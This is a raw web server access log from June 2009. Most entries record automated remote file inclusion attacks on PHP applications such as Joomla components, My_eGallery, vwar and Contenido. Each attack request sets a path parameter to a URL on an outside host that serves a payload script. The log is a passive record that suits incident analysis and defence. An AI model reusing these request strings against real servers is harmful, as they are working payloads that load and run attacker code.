74.200.195.130 - - [22/Jun/2009:03:33:30 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:31 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:31 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:31 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:31 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:33:33 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:33:33 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:33:33 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:39 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:45 -0400] "GET /logs/access_log.Q109053000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:15 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:15 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:16 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:25 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:47 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:34:47 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:05 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:03:35:10 -0400] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:13 -0400] "GET /logs/access_log.Q109050800%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:15 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:16 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:18 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:18 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:30 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:35:31 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.234.21.178 - - [22/Jun/2009:03:35:38 -0400] "GET /logs/access_log.Q109061100//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.234.21.178 - - [22/Jun/2009:03:35:43 -0400] "GET /logs/access_log.Q109061100//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [22/Jun/2009:03:36:10 -0400] "GET /logs/access_log.Q109061100//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.200.195.130 - - [22/Jun/2009:03:36:10 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:36:10 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:36:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [22/Jun/2009:03:36:47 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:36:47 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:36:47 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.23.158.226 - - [22/Jun/2009:03:37:05 -0400] "GET /logs/access_log.Q109061100//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
61.250.85.185 - - [22/Jun/2009:03:37:10 -0400] "GET /logs/error_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
124.138.156.3 - - [22/Jun/2009:03:37:10 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
124.138.156.3 - - [22/Jun/2009:03:37:11 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.138.156.3 - - [22/Jun/2009:03:37:15 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:27 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:28 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:28 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
124.138.156.3 - - [22/Jun/2009:03:37:39 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:37:43 -0400] "GET /?sourcedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:37:43 -0400] "GET /logs/?sourcedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:37:43 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:57 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:57 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:37:58 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:09 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:31 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:39 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:39 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:39 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:38:40 -0400] "GET /logs/access_log.Q109052900%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:46 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:46 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:46 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:46 -0400] "GET /logs/access_log.Q109051900/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:47 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:47 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:47 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:38:47 -0400] "GET /logs/access_log.Q109051900/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:03:39:12 -0400] "GET /images/over-index_orthoscrew.jpg HTTP/1.1" 200 12452 "-" "Googlebot-Image/1.0"
74.200.195.130 - - [22/Jun/2009:03:39:53 -0400] "GET /logs/access_log.Q109052900%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:03:39:53 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
209.51.133.202 - - [22/Jun/2009:03:40:17 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:03:40:17 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:03:40:17 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:03:40:26 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:40:27 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:40:27 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:40:27 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:03:40:34 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:03:40:34 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:03:40:34 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:03:40:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:03:40:40 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
85.214.145.133 - - [22/Jun/2009:03:40:40 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:03:40:40 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
218.38.136.251 - - [22/Jun/2009:03:40:44 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:40:44 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:40:44 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:03:41:14 -0400] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:41:23 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.234.21.178 - - [22/Jun/2009:03:41:25 -0400] "GET /logs/error_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
69.94.125.100 - - [22/Jun/2009:03:41:38 -0400] "GET /logs/access_log.Q109061300//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:41:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.21.178 - - [22/Jun/2009:03:41:53 -0400] "GET /logs/error_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.51.133.202 - - [22/Jun/2009:03:42:07 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:03:42:07 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:42:20 -0400] "GET /logs/access_log.Q109052900%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:42:57 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:43:00 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:03:43:12 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:03:43:16 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:35 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:35 -0400] "GET //?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:35 -0400] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:50 -0400] "GET //?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:43:51 -0400] "GET /logs/access_log.Q109051200%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:44:05 -0400] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:44:06 -0400] "GET //rgboard/include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:44:06 -0400] "GET /logs/access_log.Q109052800//rgboard/include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:44:07 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:44:08 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:44:19 -0400] "GET /logs/error_log.Q109051400%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
88.238.86.212 - - [22/Jun/2009:03:44:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
